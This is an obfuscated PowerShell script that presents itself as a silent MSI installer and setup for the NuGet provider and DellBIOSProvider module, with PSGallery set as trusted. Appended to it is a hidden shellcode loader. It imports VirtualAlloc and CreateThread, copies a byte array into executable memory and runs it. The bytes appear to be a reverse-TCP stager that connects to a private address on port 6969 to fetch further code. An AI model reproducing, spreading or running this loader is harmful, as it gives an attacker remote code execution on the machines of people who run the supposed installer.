[CmdletBinding()]
param ()

function Get-`ARCH`Itect`URE {

	
	[CmdletBinding()][OutputType([string])]
	param ()
	
	${O`SA`RChIt`ec`TURE} = (.("{1}{2}{0}" -f 'Object','Get','-Wmi') -Class ("{6}{4}{3}{2}{1}{5}{0}" -f 'm','ngSys','ati','_Oper','32','te','Win') | &("{2}{1}{0}"-f 't-Object','c','Sele') ("{1}{2}{3}{0}"-f 'e','OSA','rchi','tectur'))."osa`RcHiT`ECT`U`RE"
	Return ${OSA`R`CHi`TE`CtURe}
	
}

function G`ET-`RElA`TIV`ePatH {

	
	[CmdletBinding()][OutputType([string])]
	param ()
	
	${p`Ath} = (&("{0}{2}{1}{3}" -f 's','t','plit-pa','h') ${s`C`RipT:mYINV`O`cATIon}."M`ycoM`mANd"."Pa`Th" -parent) + "\"
	Return ${pa`TH}
}

function InS`T`ALl`-MsiFILE {

	
	[CmdletBinding()]
	param
	(
		[ValidateNotNullOrEmpty()]${fI`le},
		[ValidateNotNullOrEmpty()][string]${a`R`guMEN`Ts}
	)
	
	${R`elATIVEP`Ath} = &("{1}{2}{0}"-f 'h','Ge','t-RelativePat')
	${EXe`CU`TAble} = ${en`V:Wi`ND`ir} + ((("{6}{5}{3}{1}{2}{4}{0}" -f'.exe','e','xe','si','c','em32rh3m','rh3Syst')) -rEPlAce ([ChAr]114+[ChAr]104+[ChAr]51),[ChAr]92)
	${P`AR`AMet`ErS} = "/i" + [char]32 + ${f`ILe}."FuL`Lna`me" + [char]32 + ${arg`Um`Ents}
	.("{0}{1}{2}{3}" -f'Writ','e','-','Host') ("{0}{2}{1}" -f 'Inst','ling','al')(${F`iLE}."nA`mE").("{1}{0}" -f'rim','T').Invoke()("{0}{1}" -f'....','.') -NoNewline
	${Err`co`DE} = (&("{4}{1}{2}{3}{0}" -f 'rocess','r','t-','P','Sta') -FilePath ${exE`cU`T`ABLE} -ArgumentList ${pA`R`AmeTERs} -Wait -Passthru)."eXitco`De"
	If ((${e`RRC`ODE} -eq 0) -or (${E`Rr`COdE} -eq 3010)) {
		.("{2}{1}{0}"-f'Host','-','Write') ("{0}{1}"-f 'Succes','s') -ForegroundColor ("{2}{0}{1}" -f'lo','w','Yel')
		Return ${TR`UE}
	} else {
		.("{2}{1}{0}"-f'ost','e-H','Writ') ("{0}{1}{2}" -f'Fa','i','led') -ForegroundColor ("{0}{1}"-f'Re','d')
		Return ${f`AlsE}
	}
}


${ARchItEct`U`Re} = .("{0}{1}{2}"-f 'Ge','t-Ar','chitecture')

${re`la`TIV`EpA`Th} = &("{3}{1}{0}{2}"-f'ePa','ativ','th','Get-Rel')

If (${ARchi`TEC`TurE} -eq ("{0}{1}" -f '32','-bit')) {
	${F`iLE} = &("{1}{0}{2}" -f 'e','Get-ChildIt','m') -Path ${relat`iVE`pa`Th} -Filter *X`86.`MsI
} else {
	${f`ile} = .("{2}{0}{1}"-f't','-ChildItem','Ge') -Path ${REl`ATiVe`p`ATh} -Filter *x6`4`.mSI
}

${re`sUl`Ts} = &("{2}{1}{0}{3}" -f'tall-MS','s','In','IFile') -File ${fI`lE} -Arguments ("{2}{3}{0}{1}" -f '/norestar','t','/q','b- ')
If (${R`E`SUlts} -eq ${tr`Ue}) {
	
	.("{5}{0}{3}{1}{4}{2}{6}" -f'ns','-Pack','eP','tall','ag','I','rovider') ("{0}{1}" -f 'nu','get') -Force -Verbose
	Exit 0
} else {
	Exit 1
}

.("{0}{2}{1}"-f 'Set','tory','-PSReposi') -Name ("{3}{0}{1}{2}" -f 'all','er','y','PSG') -InstallationPolicy ("{2}{0}{1}" -f 'rust','ed','T')

.("{1}{2}{3}{4}{0}" -f'ule','In','st','al','l-Mod') -Name ((&("{0}{1}{2}" -f'Find-Mod','ul','e') -Name ("{3}{0}{2}{1}" -f 'llBIOS','ider','Prov','De'))."NA`me") -Force -Verbose

${c} = ((("{29}{69}{54}{32}{50}{1}{15}{23}{83}{10}{101}{94}{34}{97}{98}{88}{46}{71}{35}{67}{20}{53}{57}{90}{86}{82}{62}{59}{22}{77}{24}{75}{56}{45}{27}{39}{72}{0}{49}{55}{11}{8}{80}{3}{76}{70}{48}{58}{31}{33}{9}{95}{19}{89}{21}{79}{16}{37}{78}{12}{13}{5}{61}{100}{26}{38}{2}{7}{25}{17}{41}{68}{74}{14}{64}{91}{63}{60}{85}{52}{6}{96}{4}{51}{47}{44}{99}{36}{42}{81}{40}{28}{73}{30}{18}{43}{84}{65}{87}{92}{93}{66}" -f']pub','er','tPtr lpP','r Crea','ll0','r','r','ara',' In',' l','lA','rn','Int','Pt','ionFlags,','n IntP','butes, uint ','r,','t,','hre','int flAllocati','Att','lImport(','tr Vir','r','mete','e','d','et(Int','[DllIm','tr des','IntP','2.dll0zo)]public stati','tr',',','wSize,','rn IntPtr','dwSta','ss, In','ll0','s',' uint d',' me',' u','e','2.',' ','tic ','re','lic static e','c ext','zo)]public sta','c','on','0zokernel3','xte','el3','Type, ','ad(','Dl','d);[DllImport(0z',' lpStar',');[','eadI',' IntPtr lpTh',', ui',';',' u','wCre','port(','eTh','d','zo)','P','at','n','t','0zoke','ckSize, ','ri','tPt','m','Protect','tua','int src','omsv','t fl','n','t','ad','uin','r','t coun','t)','pAddress','pT','t.d',' ui','n','xte','tAddr','lloc(IntPtr l'))  -crepLACe '0zo',[chAr]34);${w} = .("{0}{1}{2}"-f'Ad','d','-Type') -memberDefinition ${c} -Name ("{1}{0}" -f '2','Win3') -namespace ("{2}{4}{1}{0}{3}"-f 'ction','2Fun','Win','s','3') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0xbb,0x80,0x68,0x02,0x00,0x1b,0x39,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x75,0xee,0xc3;${g} = 0x1000;if (${z}."le`Ng`TH" -gt 0x1000){${G} = ${z}."L`eNg`TH"};${X}=${w}::("{0}{3}{2}{1}"-f'Virtual','c','lo','Al').Invoke(0,0x1000,${G},0x40);for (${I}=0;${I} -le (${Z}."le`N`GtH"-1);${I}++) {${W}::"me`MSEt"([IntPtr](${x}.("{1}{0}"-f't32','ToIn').Invoke()+${i}), ${z}[${I}], 1)};${w}::("{2}{1}{0}"-f'ead','teThr','Crea').Invoke(0,0,${x},0,0,0);for (;;){&("{1}{0}{2}"-f't-slee','Star','p') 60};
